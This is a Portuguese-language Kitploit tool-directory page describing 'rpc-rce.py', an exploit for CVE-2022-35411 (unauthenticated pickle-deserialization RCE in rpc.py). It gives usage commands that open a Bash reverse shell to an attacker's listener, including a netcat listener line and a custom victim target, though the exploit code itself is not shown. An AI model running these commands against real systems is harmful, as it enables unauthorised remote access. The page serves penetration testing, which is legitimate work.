Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
rpc-rce.py — Exploit para CVE-2022-35411 — RCE não autenticada em rpc.py (<= 0.6.0) | Kitploit
Ferramentas/GitHubGitHub/cspanias/rpc-rce.py
Geração de PayloadsAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoFerramenta de Acesso Remoto
GitHubcspanias/rpc-rce.py

rpc-rce.py

Exploit para CVE-2022-35411 — RCE não autenticada em rpc.py (<= 0.6.0)

Ver Repositório
2há 1 anoAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

Exploit RCE do rpc.py (CVE-2022-35411)

Este é um exploit atualizado e melhorado para CVE-2022-35411, visando versões vulneráveis do rpc.py (<= 0.6.0).
Permite execução remota de código (RCE) não autenticada através da desserialização de pickle do Python.

Exploit original por: Elias Hohl
Melhorado por: x7331 para usabilidade, portabilidade e automação


Resumo da Vulnerabilidade

A vulnerabilidade reside no uso inseguro do módulo pickle do Python pelo rpc.py, permitindo que payloads elaborados executem comandos arbitrários sem autenticação.

  • CVE ID: CVE-2022-35411
  • Versões Afetadas: rpc.py v0.4.2 – v0.6.0
  • Tipo de Exploit: Execução Remota de Código (RCE) Não Autenticada

Alterações

  • ✅ Mudou para argparse com flags --lhost, --lport, --target e --dry-run
  • ✅ Estrutura de código limpa e modular
  • ✅ Entrega opcional de reverse shell (TCP Bash)
  • ✅ Payload de teste Curl (modo seguro)
  • ✅ Suporte a logging e saída mais limpa
  • ✅ Guia de uso adequado via -h / --help
  • ✅ Metadados e comentários inline para clareza

Uso

Exemplo de Reverse Shell

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001

Dry Run (sem shell, apenas teste curl)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --dry-run

Alvo Personalizado (opcional)

root@kitploit:~
python3 rpc-rce.py --lhost 10.10.14.1 --lport 9001 --target http://victim.internal:65432/sayhi

Requisitos

  • Python 3.x
  • Biblioteca requests (instalar com pip install requests)
  • Um listener no seu LHOST (ex.: nc -lvnp 9001)
  • Servidor rpc.py vulnerável em execução

Aviso Legal e Ético

Este exploit é fornecido apenas para fins educacionais e de teste autorizado. NÃO o utilize em sistemas que você não possui ou para os quais não possui permissão explícita para testar.

Baixar ferramenta